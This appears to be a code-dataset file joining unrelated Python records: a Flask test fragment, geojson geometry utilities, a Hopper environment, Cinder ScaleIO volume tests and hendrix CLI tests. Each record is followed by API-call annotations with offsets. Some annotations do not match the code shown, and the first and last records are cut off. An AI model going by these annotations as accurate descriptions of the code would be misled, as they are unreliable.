self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred')
self.assertEqual(handler_span.resource, '/500')
self.assertEqual(handler_span.error, 1)
self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(handler_span.get_tag('error.type'), base_exception_name)
# User exception span
user_ex_span = spans[5]
self.assertEqual(user_ex_span.service, 'flask')
self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.error, 1)
self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name)
| [
"flask.abort"
] | [((16267, 16277), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (16272, 16277), False, 'from flask import abort\n'), ((22922, 22932), 'flask.abort', 'abort', (['(501)'], {}), '(501)\n', (22927, 22932), False, 'from flask import abort\n')] |
__doc__ = 'github: https://github.com/brandonxiang/geojson-python-utils'
import math
from coordTransform_utils import wgs84togcj02
from coordTransform_utils import gcj02tobd09
def linestrings_intersect(line1, line2):
"""
    To check whether linestrings from geojson intersect with each other.
reference: http://www.kevlindev.com/gui/math/intersection/Intersection.js
Keyword arguments:
line1 -- first line geojson object
line2 -- second line geojson object
    if(line1 intersects with line2) return intersect point array else empty array
"""
intersects = []
for i in range(0, len(line1['coordinates']) - 1):
for j in range(0, len(line2['coordinates']) - 1):
a1_x = line1['coordinates'][i][1]
a1_y = line1['coordinates'][i][0]
a2_x = line1['coordinates'][i + 1][1]
a2_y = line1['coordinates'][i + 1][0]
b1_x = line2['coordinates'][j][1]
b1_y = line2['coordinates'][j][0]
b2_x = line2['coordinates'][j + 1][1]
b2_y = line2['coordinates'][j + 1][0]
ua_t = (b2_x - b1_x) * (a1_y - b1_y) - \
(b2_y - b1_y) * (a1_x - b1_x)
ub_t = (a2_x - a1_x) * (a1_y - b1_y) - \
(a2_y - a1_y) * (a1_x - b1_x)
u_b = (b2_y - b1_y) * (a2_x - a1_x) - (b2_x - b1_x) * (a2_y - a1_y)
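            # u_b is the shared denominator of the parametric solution; zero means the segments are parallel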
if not u_b == 0:
u_a = ua_t / u_b
u_b = ub_t / u_b
if 0 <= u_a and u_a <= 1 and 0 <= u_b and u_b <= 1:
intersects.append({'type': 'Point', 'coordinates': [
a1_x + u_a * (a2_x - a1_x), a1_y + u_a * (a2_y - a1_y)]})
# if len(intersects) == 0:
# intersects = False
return intersects
def _bbox_around_polycoords(coords):
"""
bounding box
"""
x_all = []
y_all = []
for first in coords[0]:
x_all.append(first[1])
y_all.append(first[0])
return [min(x_all), min(y_all), max(x_all), max(y_all)]
def _point_in_bbox(point, bounds):
"""
    check whether the point is inside the bounding box
"""
return not(point['coordinates'][1] < bounds[0] or point['coordinates'][1] > bounds[2]
or point['coordinates'][0] < bounds[1] or point['coordinates'][0] > bounds[3])
def _pnpoly(x, y, coords):
"""
    the ray-casting (pnpoly) algorithm to judge whether the point is located in the polygon
reference: https://www.ecse.rpi.edu/~wrf/Research/Short_Notes/pnpoly.html#Explanation
"""
vert = [[0, 0]]
for coord in coords:
for node in coord:
vert.append(node)
vert.append(coord[0])
vert.append([0, 0])
inside = False
i = 0
j = len(vert) - 1
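    # ray casting: flip `inside` every time a horizontal ray from (x, y) crosses a polygon edge;
    # an odd number of crossings leaves the point inside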
while i < len(vert):
if ((vert[i][0] > y) != (vert[j][0] > y)) and (x < (vert[j][1] - vert[i][1])
* (y - vert[i][0]) / (vert[j][0] - vert[i][0]) + vert[i][1]):
inside = not inside
j = i
i += 1
return inside
def _point_in_polygon(point, coords):
inside_box = False
for coord in coords:
if inside_box:
break
if _point_in_bbox(point, _bbox_around_polycoords(coord)):
inside_box = True
if not inside_box:
return False
inside_poly = False
for coord in coords:
if inside_poly:
break
if _pnpoly(point['coordinates'][1], point['coordinates'][0], coord):
inside_poly = True
return inside_poly
def point_in_polygon(point, poly):
"""
    check whether the point is located in a polygon
Keyword arguments:
point -- point geojson object
poly -- polygon geojson object
if(point inside poly) return true else false
"""
coords = [poly['coordinates']] if poly[
'type'] == 'Polygon' else poly['coordinates']
return _point_in_polygon(point, coords)
def point_in_multipolygon(point, multipoly):
"""
    check whether the point is located in a multipolygon (donut polygon is not supported)
Keyword arguments:
point -- point geojson object
multipoly -- multipolygon geojson object
if(point inside multipoly) return true else false
"""
coords_array = [multipoly['coordinates']] if multipoly[
'type'] == "MultiPolygon" else multipoly['coordinates']
for coords in coords_array:
if _point_in_polygon(point, coords):
return True
return False
def number2radius(number):
"""
    convert degrees into radians
    Keyword arguments:
    number -- angle in degrees
    return angle in radians
"""
return number * math.pi / 180
def number2degree(number):
"""
    convert radians into degrees
    Keyword arguments:
    number -- angle in radians
    return angle in degrees
"""
return number * 180 / math.pi
def draw_circle(radius_in_meters, center_point, steps=15):
"""
get a circle shape polygon based on centerPoint and radius
Keyword arguments:
    radius_in_meters -- circle radius in meters
    center_point -- center point geojson object
    steps -- number of vertices of the approximated circle (minimum 15)
    return a circle-shaped Polygon geojson object
"""
steps = steps if steps > 15 else 15
center = [center_point['coordinates'][1], center_point['coordinates'][0]]
dist = (radius_in_meters / 1000) / 6371
    # convert meters to an angular distance in radians (Earth mean radius 6371 km)
rad_center = [number2radius(center[0]), number2radius(center[1])]
# 15 sided circle
poly = []
for step in range(0, steps):
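        # for each bearing around the full circle, project the (bearing, angular distance) pair
        # from the center onto the sphere to get one polygon vertex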
brng = 2 * math.pi * step / steps
lat = math.asin(math.sin(rad_center[0]) * math.cos(dist) +
math.cos(rad_center[0]) * math.sin(dist) * math.cos(brng))
lng = rad_center[1] + math.atan2(math.sin(brng) * math.sin(dist)
* math.cos(rad_center[0]), math.cos(dist) - math.sin(rad_center[0]) * math.sin(lat))
poly.append([number2degree(lng), number2degree(lat)])
return {"type": "Polygon", "coordinates": [poly]}
def rectangle_centroid(rectangle):
"""
get the centroid of the rectangle
Keyword arguments:
rectangle -- polygon geojson object
return centroid
"""
bbox = rectangle['coordinates'][0]
xmin = bbox[0][0]
ymin = bbox[0][1]
xmax = bbox[2][0]
ymax = bbox[2][1]
xwidth = xmax - xmin
ywidth = ymax - ymin
return {'type': 'Point', 'coordinates': [xmin + xwidth / 2, ymin + ywidth / 2]}
def point_distance(point1, point2):
"""
    calculate the distance in meters between two points on the sphere, like Google Maps
reference http://www.movable-type.co.uk/scripts/latlong.html
Keyword arguments:
point1 -- point one geojson object
point2 -- point two geojson object
    return the great-circle distance between the two points in meters
"""
lon1 = point1['coordinates'][0]
lat1 = point1['coordinates'][1]
lon2 = point2['coordinates'][0]
lat2 = point2['coordinates'][1]
deg_lat = number2radius(lat2 - lat1)
deg_lon = number2radius(lon2 - lon1)
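    # haversine formula: a is the squared half chord length, c the angular distance in radians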
a = math.pow(math.sin(deg_lat / 2), 2) + math.cos(number2radius(lat1)) * \
math.cos(number2radius(lat2)) * math.pow(math.sin(deg_lon / 2), 2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
return (6371 * c) * 1000
def geometry_within_radius(geometry, center, radius):
"""
    To validate whether a point, linestring or polygon is inside a radius around a center
Keyword arguments:
geometry -- point/linstring/polygon geojson object
center -- point geojson object
radius -- radius
if(geometry inside radius) return true else false
"""
if geometry['type'] == 'Point':
return point_distance(geometry, center) <= radius
elif geometry['type'] == 'LineString' or geometry['type'] == 'Polygon':
point = {}
# it's enough to check the exterior ring of the Polygon
coordinates = geometry['coordinates'][0] if geometry['type'] == 'Polygon' else geometry['coordinates']
for coordinate in coordinates:
point['coordinates'] = coordinate
if point_distance(point, center) > radius:
return False
return True
def area(poly):
"""
calculate the area of polygon
Keyword arguments:
poly -- polygon geojson object
return polygon area
"""
poly_area = 0
# TODO: polygon holes at coordinates[1]
points = poly['coordinates'][0]
j = len(points) - 1
count = len(points)
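    # shoelace formula: sum the cross products of consecutive vertex pairs and halve the result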
for i in range(0, count):
p1_x = points[i][1]
p1_y = points[i][0]
p2_x = points[j][1]
p2_y = points[j][0]
poly_area += p1_x * p2_y
poly_area -= p1_y * p2_x
j = i
poly_area /= 2
return poly_area
def centroid(poly):
"""
get the centroid of polygon
adapted from http://paulbourke.net/geometry/polyarea/javascript.txt
Keyword arguments:
poly -- polygon geojson object
return polygon centroid
"""
f_total = 0
x_total = 0
y_total = 0
# TODO: polygon holes at coordinates[1]
points = poly['coordinates'][0]
j = len(points) - 1
count = len(points)
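    # weight each edge by its cross product (twice the signed triangle area) and average the vertex sums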
for i in range(0, count):
p1_x = points[i][1]
p1_y = points[i][0]
p2_x = points[j][1]
p2_y = points[j][0]
f_total = p1_x * p2_y - p2_x * p1_y
x_total += (p1_x + p2_x) * f_total
y_total += (p1_y + p2_y) * f_total
j = i
six_area = area(poly) * 6
return {'type': 'Point', 'coordinates': [y_total / six_area, x_total / six_area]}
def destination_point(point, brng, dist):
"""
Calculate a destination Point base on a base point and a distance
Keyword arguments:
pt -- polygon geojson object
brng -- an angle in degrees
dist -- distance in Kilometer between destination and base point
return destination point object
"""
dist = float(dist) / 6371 # convert dist to angular distance in radians
brng = number2radius(brng)
lon1 = number2radius(point['coordinates'][0])
lat1 = number2radius(point['coordinates'][1])
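    # direct geodesic problem on a sphere: from start point, bearing and angular distance,
    # compute the destination latitude first, then the longitude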
lat2 = math.asin(math.sin(lat1) * math.cos(dist) +
math.cos(lat1) * math.sin(dist) * math.cos(brng))
lon2 = lon1 + math.atan2(math.sin(brng) * math.sin(dist) *
math.cos(lat1), math.cos(dist) - math.sin(lat1) * math.sin(lat2))
lon2 = (lon2 + 3 * math.pi) % (2 * math.pi) - math.pi # normalise to -180 degree +180 degree
return {'type': 'Point', 'coordinates': [number2degree(lon2), number2degree(lat2)]}
def simplify(source, kink=20):
"""
source[] array of geojson points
kink in metres, kinks above this depth kept
kink depth is the height of the triangle abc where a-b and b-c are two consecutive line segments
"""
    # geojson points are dicts, so read the coordinates by key; materialize the map so it can be indexed
    source_coord = list(map(lambda o: {"lng": o["coordinates"][0], "lat": o["coordinates"][1]}, source))
    # count, n_stack, n_dest, start, end, i, sig;
    # dev_sqr, max_dev_sqr, band_sqr;
    # x12, y12, d12, x13, y13, d13, x23, y23, d23;
    F = (math.pi / 180.0) * 0.5
    # check for simple cases
    count = len(source_coord)
    if count < 3:
        return source_coord  # one or two points
    # pre-allocate the working arrays so the index assignments below are valid
    index = [0] * count  # array of indexes of source points to include in the reduced line
    sig_start = [0] * count  # indices of start & end of working section
    sig_end = [0] * count
    # more complex case. initialize stack
    band_sqr = kink * 360.0 / (2.0 * math.pi * 6378137.0)  # Now in degrees
    band_sqr *= band_sqr
    n_dest = 0
    sig_start[0] = 0
    sig_end[0] = count - 1
n_stack = 1
# while the stack is not empty
while n_stack > 0:
# ... pop the top-most entries off the stacks
start = sig_start[n_stack - 1]
end = sig_end[n_stack - 1]
n_stack -= 1
if (end - start) > 1: #any intermediate points ?
# ... yes, so find most deviant intermediate point to either side of line joining start & end points
            x12 = source_coord[end]["lng"] - source_coord[start]["lng"]
            y12 = source_coord[end]["lat"] - source_coord[start]["lat"]
            if math.fabs(x12) > 180.0:
                x12 = 360.0 - math.fabs(x12)
            x12 *= math.cos(F * (source_coord[end]["lat"] + source_coord[start]["lat"]))  # use avg lat to reduce lng
d12 = (x12 * x12) + (y12 * y12)
i = start + 1
sig = start
max_dev_sqr = -1.0
while i < end:
                x13 = source_coord[i]["lng"] - source_coord[start]["lng"]
                y13 = source_coord[i]["lat"] - source_coord[start]["lat"]
                if math.fabs(x13) > 180.0:
                    x13 = 360.0 - math.fabs(x13)
                x13 *= math.cos(F * (source_coord[i]["lat"] + source_coord[start]["lat"]))
                d13 = (x13 * x13) + (y13 * y13)
                x23 = source_coord[i]["lng"] - source_coord[end]["lng"]
                y23 = source_coord[i]["lat"] - source_coord[end]["lat"]
                if math.fabs(x23) > 180.0:
                    x23 = 360.0 - math.fabs(x23)
                x23 *= math.cos(F * (source_coord[i]["lat"] + source_coord[end]["lat"]))
d23 = (x23 * x23) + (y23 * y23)
if d13 >= (d12 + d23):
dev_sqr = d23
elif d23 >= (d12 + d13):
dev_sqr = d13
else:
dev_sqr = (x13 * y12 - y13 * x12) * (x13 * y12 - y13 * x12) / d12 # solve triangle
if dev_sqr > max_dev_sqr:
sig = i
max_dev_sqr = dev_sqr
i += 1
if max_dev_sqr < band_sqr: # is there a sig. intermediate point ?
#... no, so transfer current start point
index[n_dest] = start
n_dest += 1
else: # ... yes, so push two sub-sections on stack for further processing
n_stack += 1
sig_start[n_stack - 1] = sig
sig_end[n_stack - 1] = end
n_stack += 1
sig_start[n_stack - 1] = start
sig_end[n_stack - 1] = sig
else: # ... no intermediate points, so transfer current start point
index[n_dest] = start
n_dest += 1
# transfer last point
index[n_dest] = count - 1
n_dest += 1
# make return array
r = []
for i in range(0, n_dest):
r.append(source_coord[index[i]])
    return list(map(lambda o: {"type": "Point", "coordinates": [o["lng"], o["lat"]]}, r))
def wgs2gcj(geometry):
"""
convert wgs84 to gcj
referencing by https://github.com/wandergis/coordTransform_py
"""
# TODO: point linestring point
if geometry['type'] == 'MultiLineString':
coordinates = geometry['coordinates']
for lines in coordinates:
for line in lines:
line[0], line[1] = wgs84togcj02(line[0], line[1])
return geometry
def gcj2bd(geometry):
"""
convert gcj to bd
referencing by https://github.com/wandergis/coordTransform_py
"""
# TODO: point linestring point
if geometry['type'] == 'MultiLineString':
coordinates = geometry['coordinates']
for lines in coordinates:
for line in lines:
line[0], line[1] = gcj02tobd09(line[0], line[1])
return geometry
| [
"coordTransform_utils.gcj02tobd09",
"math.sqrt",
"coordTransform_utils.wgs84togcj02",
"math.cos",
"math.fabs",
"math.sin"
] | [((7021, 7042), 'math.sin', 'math.sin', (['(deg_lat / 2)'], {}), '(deg_lat / 2)\n', (7029, 7042), False, 'import math\n'), ((7181, 7193), 'math.sqrt', 'math.sqrt', (['a'], {}), '(a)\n', (7190, 7193), False, 'import math\n'), ((7195, 7211), 'math.sqrt', 'math.sqrt', (['(1 - a)'], {}), '(1 - a)\n', (7204, 7211), False, 'import math\n'), ((12146, 12203), 'math.cos', 'math.cos', (["(F * (source[end]['lat'] + source[start]['lat']))"], {}), "(F * (source[end]['lat'] + source[start]['lat']))\n", (12154, 12203), False, 'import math\n'), ((7132, 7153), 'math.sin', 'math.sin', (['(deg_lon / 2)'], {}), '(deg_lon / 2)\n', (7140, 7153), False, 'import math\n'), ((10081, 10095), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (10089, 10095), False, 'import math\n'), ((10098, 10112), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (10106, 10112), False, 'import math\n'), ((10170, 10184), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (10178, 10184), False, 'import math\n'), ((10278, 10292), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (10286, 10292), False, 'import math\n'), ((10294, 10308), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (10302, 10308), False, 'import math\n'), ((12058, 12072), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\n', (12067, 12072), False, 'import math\n'), ((12624, 12679), 'math.cos', 'math.cos', (["(F * (source[i]['lat'] + source[start]['lat']))"], {}), "(F * (source[i]['lat'] + source[start]['lat']))\n", (12632, 12679), False, 'import math\n'), ((12963, 13016), 'math.cos', 'math.cos', (["(F * (source[i]['lat'] + source[end]['lat']))"], {}), "(F * (source[i]['lat'] + source[end]['lat']))\n", (12971, 13016), False, 'import math\n'), ((14749, 14779), 'coordTransform_utils.wgs84togcj02', 'wgs84togcj02', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\n', (14761, 14779), False, 'from coordTransform_utils import wgs84togcj02\n'), ((15155, 15184), 'coordTransform_utils.gcj02tobd09', 'gcj02tobd09', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\n', (15166, 15184), False, 'from coordTransform_utils import gcj02tobd09\n'), ((5546, 5569), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\n', (5554, 5569), False, 'import math\n'), ((5572, 5586), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (5580, 5586), False, 'import math\n'), ((5656, 5670), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (5664, 5670), False, 'import math\n'), ((5788, 5811), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\n', (5796, 5811), False, 'import math\n'), ((5813, 5827), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (5821, 5827), False, 'import math\n'), ((10136, 10150), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (10144, 10150), False, 'import math\n'), ((10153, 10167), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (10161, 10167), False, 'import math\n'), ((10215, 10229), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (10223, 10229), False, 'import math\n'), ((10232, 10246), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (10240, 10246), False, 'import math\n'), ((10311, 10325), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (10319, 10325), False, 'import math\n'), ((10328, 10342), 'math.sin', 'math.sin', (['lat2'], {}), '(lat2)\n', (10336, 10342), False, 'import math\n'), ((12112, 12126), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\n', (12121, 12126), False, 'import math\n'), ((12528, 12542), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\n', (12537, 12542), False, 'import math\n'), ((12867, 
12881), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\n', (12876, 12881), False, 'import math\n'), ((5613, 5636), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\n', (5621, 5636), False, 'import math\n'), ((5639, 5653), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (5647, 5653), False, 'import math\n'), ((5713, 5727), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (5721, 5727), False, 'import math\n'), ((5730, 5744), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (5738, 5744), False, 'import math\n'), ((5830, 5853), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\n', (5838, 5853), False, 'import math\n'), ((5856, 5869), 'math.sin', 'math.sin', (['lat'], {}), '(lat)\n', (5864, 5869), False, 'import math\n'), ((12586, 12600), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\n', (12595, 12600), False, 'import math\n'), ((12925, 12939), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\n', (12934, 12939), False, 'import math\n')] |
import gym.envs.mujoco.hopper as hopper
import numpy as np
class HopperEnv(hopper.HopperEnv):
def _get_obs(self):
return np.concatenate([
self.sim.data.qpos.flat[1:],
self.sim.data.qvel.flat,
])
def reset_obs(self, obs):
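        # the observation drops the root x-position (qpos[0]), so prepend a zero before
        # splitting the state back into qpos and qvel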
state = np.insert(obs, 0, 0.)
qpos = state[:self.model.nq]
qvel = state[self.model.nq:]
self.set_state(qpos, qvel)
return self._get_obs()
| [
"numpy.insert",
"numpy.concatenate"
] | [((135, 205), 'numpy.concatenate', 'np.concatenate', (['[self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat]'], {}), '([self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat])\n', (149, 205), True, 'import numpy as np\n'), ((288, 310), 'numpy.insert', 'np.insert', (['obs', '(0)', '(0.0)'], {}), '(obs, 0, 0.0)\n', (297, 310), True, 'import numpy as np\n')] |
# Copyright (c) 2013 - 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from six.moves import urllib
from cinder import context
from cinder import exception
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_volume
from cinder.tests.unit.volume.drivers.emc import scaleio
from cinder.tests.unit.volume.drivers.emc.scaleio import mocks
class TestDeleteVolume(scaleio.TestScaleIODriver):
"""Test cases for ``ScaleIODriver.delete_volume()``"""
def setUp(self):
"""Setup a test case environment.
Creates a fake volume object and sets up the required API responses.
"""
super(TestDeleteVolume, self).setUp()
ctx = context.RequestContext('fake', 'fake', auth_token=True)
self.volume = fake_volume.fake_volume_obj(
ctx, **{'provider_id': fake.PROVIDER_ID})
self.volume_name_2x_enc = urllib.parse.quote(
urllib.parse.quote(self.driver._id_to_base64(self.volume.id))
)
self.HTTPS_MOCK_RESPONSES = {
self.RESPONSE_MODE.Valid: {
'types/Volume/instances/getByName::' +
self.volume_name_2x_enc: self.volume.id,
'instances/Volume::{}/action/removeMappedSdc'.format(
self.volume.provider_id): self.volume.provider_id,
'instances/Volume::{}/action/removeVolume'.format(
self.volume.provider_id
): self.volume.provider_id,
},
self.RESPONSE_MODE.BadStatus: {
'types/Volume/instances/getByName::' +
self.volume_name_2x_enc: mocks.MockHTTPSResponse(
{
'errorCode': 401,
'message': 'BadStatus Volume Test',
}, 401
),
'instances/Volume::{}/action/removeVolume'.format(
self.volume.provider_id
): mocks.MockHTTPSResponse(
{
'errorCode': 401,
'message': 'BadStatus Volume Test',
}, 401
),
},
}
def test_bad_login_and_volume(self):
self.set_https_response_mode(self.RESPONSE_MODE.BadStatus)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.volume)
def test_delete_volume(self):
"""Setting the unmap volume before delete flag for tests """
self.driver.configuration.set_override(
'sio_unmap_volume_before_deletion',
override=True)
self.driver.delete_volume(self.volume)
| [
"cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse",
"cinder.tests.unit.fake_volume.fake_volume_obj",
"cinder.context.RequestContext"
] | [((1268, 1323), 'cinder.context.RequestContext', 'context.RequestContext', (['"""fake"""', '"""fake"""'], {'auth_token': '(True)'}), "('fake', 'fake', auth_token=True)\n", (1290, 1323), False, 'from cinder import context\n'), ((1347, 1416), 'cinder.tests.unit.fake_volume.fake_volume_obj', 'fake_volume.fake_volume_obj', (['ctx'], {}), "(ctx, **{'provider_id': fake.PROVIDER_ID})\n", (1374, 1416), False, 'from cinder.tests.unit import fake_volume\n'), ((2211, 2299), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', (["{'errorCode': 401, 'message': 'BadStatus Volume Test'}", '(401)'], {}), "({'errorCode': 401, 'message':\n 'BadStatus Volume Test'}, 401)\n", (2234, 2299), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n'), ((2536, 2624), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', (["{'errorCode': 401, 'message': 'BadStatus Volume Test'}", '(401)'], {}), "({'errorCode': 401, 'message':\n 'BadStatus Volume Test'}, 401)\n", (2559, 2624), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n')] |
# -*- coding: utf-8 -*-
__version__ = '1.0.2'
import os
import appdirs
import osmnx as ox
import joblib
import requests
from .files import load_vars, save_vars, cached, inflate_tar, download_zipfile
from .data import data, list_data, problematic
from .tools.view_code import show_file
from . import mapping
cache_dir = None
memory = None
def set_cache_dir(location=None, compress=True, verbose=0, **kwargs):
"""
Set up a cache directory for use with the tutorials.
	Parameters
	----------
	location : Path-like or False, optional
A path for the cache files. Set to False to disable caching.
"""
global memory, cache_dir
if location is None:
location = appdirs.user_cache_dir('transportation_tutorials')
if location is False:
location = None
memory = joblib.Memory(location, compress=compress, verbose=verbose, **kwargs)
make_cache = (
(ox, 'gdf_from_place'),
(ox, 'graph_from_bbox'),
(requests, 'get'),
(requests, 'post'),
)
for module, func_name in make_cache:
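		# keep a reference to the pristine original so repeated calls to set_cache_dir()
		# re-wrap the original function instead of an already-cached wrapper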
try:
func = getattr(module, f"_{func_name}_orig")
except AttributeError:
func = getattr(module, func_name)
setattr(module, f"_{func_name}_orig", func)
setattr(module, func_name, memory.cache(func))
set_cache_dir()
| [
"joblib.Memory",
"appdirs.user_cache_dir"
] | [((772, 841), 'joblib.Memory', 'joblib.Memory', (['location'], {'compress': 'compress', 'verbose': 'verbose'}), '(location, compress=compress, verbose=verbose, **kwargs)\n', (785, 841), False, 'import joblib\n'), ((668, 718), 'appdirs.user_cache_dir', 'appdirs.user_cache_dir', (['"""transportation_tutorials"""'], {}), "('transportation_tutorials')\n", (690, 718), False, 'import appdirs\n')] |
import os
import sys
from . import HendrixTestCase, TEST_SETTINGS
from hendrix.contrib import SettingsError
from hendrix.options import options as hx_options
from hendrix import ux
from mock import patch
class TestMain(HendrixTestCase):
def setUp(self):
super(TestMain, self).setUp()
self.DEFAULTS = hx_options()
os.environ['DJANGO_SETTINGS_MODULE'] = ''
self.devnull = open(os.devnull, 'w')
self.args_list = ['hx', 'start']
self.patcher = patch('hendrix.ux.findSettingsModule')
self.patcher.start()
def tearDown(self):
super(TestMain, self).tearDown()
self.devnull.close()
self.patcher.stop()
def test_settings_from_system_variable(self):
django_settings = 'django.inanity'
with patch('hendrix.ux.findSettingsModule') as findSettingsMod:
findSettingsMod.return_value = django_settings
options = self.DEFAULTS
self.assertEqual(options['settings'], '')
options = ux.djangoVsWsgi(options)
self.assertEqual(options['settings'], django_settings)
def test_settings_wsgi_absense(self):
with patch('hendrix.ux.findSettingsModule') as findSettingsMod:
findSettingsMod.return_value = ""
self.assertRaises(SettingsError, ux.djangoVsWsgi, self.DEFAULTS)
def test_user_settings_overrides_system_variable(self):
django_settings = 'django.inanity'
with patch('hendrix.ux.findSettingsModule') as findSettingsMod:
findSettingsMod.return_value = django_settings
options = self.DEFAULTS
user_settings = 'myproject.settings'
options['settings'] = user_settings
self.assertEqual(options['settings'], user_settings)
options = ux.djangoVsWsgi(options)
self.assertEqual(options['settings'], user_settings)
def test_wsgi_correct_wsgi_path_works(self):
wsgi_dot_path = 'hendrix.test.wsgi'
options = self.DEFAULTS
options.update({'wsgi': wsgi_dot_path})
options = ux.djangoVsWsgi(options)
self.assertEqual(options['wsgi'], wsgi_dot_path)
def test_wsgi_wrong_path_raises(self):
wsgi_dot_path = '_this.leads.nowhere.man'
options = self.DEFAULTS
options.update({'wsgi': wsgi_dot_path})
self.assertRaises(ImportError, ux.djangoVsWsgi, options)
def test_cwd_exposure(self):
cwd = os.getcwd()
_path = sys.path
sys.path = [p for p in _path if p != cwd]
self.assertTrue(cwd not in sys.path)
ux.exposeProject(self.DEFAULTS)
self.assertTrue(cwd in sys.path)
def test_pythonpath(self):
options = self.DEFAULTS
test_path = os.path.join(
os.path.dirname(os.getcwd()),
'hendrix/test/testproject'
)
options['pythonpath'] = test_path
ux.exposeProject(options)
self.assertTrue(test_path in sys.path)
sys.path = [p for p in sys.path if p != test_path]
def test_shitty_pythonpath(self):
options = self.DEFAULTS
test_path = '/if/u/have/this/path/you/suck'
options['pythonpath'] = test_path
self.assertRaises(IOError, ux.exposeProject, options)
def test_dev_friendly_options(self):
options = self.DEFAULTS
options['dev'] = True
self.assertFalse(options['reload'])
self.assertFalse(options['loud'])
options = ux.devFriendly(options)
self.assertTrue(options['reload'])
self.assertTrue(options['loud'])
def test_noise_control_daemonize(self):
options = self.DEFAULTS
options['quiet'] = True
options['daemonize'] = True
stdout = sys.stdout
stderr = sys.stderr
redirect = ux.noiseControl(options)
self.assertEqual(sys.stdout.name, stdout.name)
self.assertEqual(sys.stderr.name, stderr.name)
self.assertEqual(redirect, None)
def test_noise_control_traceback(self):
options = self.DEFAULTS
options['quiet'] = True
options['daemonize'] = True
options['traceback'] = True
stdout = sys.stdout
stderr = sys.stderr
redirect = ux.noiseControl(options)
self.assertEqual(sys.stdout.name, stdout.name)
self.assertEqual(sys.stderr.name, stderr.name)
self.assertEqual(redirect, None)
def test_main_with_daemonize(self):
sys.argv = self.args_list + ['-d', '--settings', TEST_SETTINGS]
class Process(object):
def poll(self):
return 0
with patch('time.sleep'):
with patch('subprocess.Popen') as popen:
popen.return_value = Process()
ux.main()
self.assertTrue(popen.called)
self.assertTrue('--settings' in popen.call_args[0][0])
sys.argv = []
def test_options_structure(self):
"""
A test to ensure that HendrixDeploy.options also has the complete set
of options available
"""
deploy = self.wsgiDeploy()
expected_keys = self.DEFAULTS.keys()
actual_keys = deploy.options.keys()
self.assertListEqual(expected_keys, actual_keys)
| [
"hendrix.options.options",
"mock.patch",
"hendrix.ux.noiseControl",
"hendrix.ux.djangoVsWsgi",
"os.getcwd",
"hendrix.ux.main",
"hendrix.ux.devFriendly",
"hendrix.ux.exposeProject"
